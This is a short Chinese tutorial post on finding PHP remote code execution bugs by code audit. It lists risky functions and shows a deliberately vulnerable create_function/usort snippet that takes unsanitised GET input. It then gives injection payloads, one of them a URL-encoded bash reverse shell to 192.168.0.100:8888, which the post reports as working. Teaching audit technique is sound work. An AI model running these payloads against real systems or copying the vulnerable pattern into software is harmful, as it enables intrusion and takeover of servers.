白盒审计远程代码执行漏洞

信息安全不简单鸭 2024-07-18 10:55:08

远程代码执行漏洞的挖掘主要以白盒审计为主,需要注意可以远程执行代码的函数。PHP语言需要注意eval、assert、create_function、array_map、call_user_func 、call_user_func_array、array_filter、usort、uasort、include、include_once、require、require_once等。

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

这里用usort 和 create_function 举例比较容易理解,使用用户自定义函数对数组 $array 中的元素进行自定义排序,然而黑客的恶意输入,将可能带来灾难性的后果。

<?php$c=$_GET['c'];$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));");$array=array('1','22','333','4444');usort($array,$lambda);print_r($array);?>

验证代码执行,输入如下内容:

1));}phpinfo();/*

反弹一个shell看看,输入如下内容:

1));}exec(%27bash%20-c%20"bash%20-i%20>%26%20%2Fdev%2Ftcp%2F192.168.0.100%2F8888%200>%261"%27);/*

反弹shell成功~

发布于 2023-09-02 15:12・IP 属地江苏

0 阅读:0

信息安全不简单鸭

简介:感谢大家的关注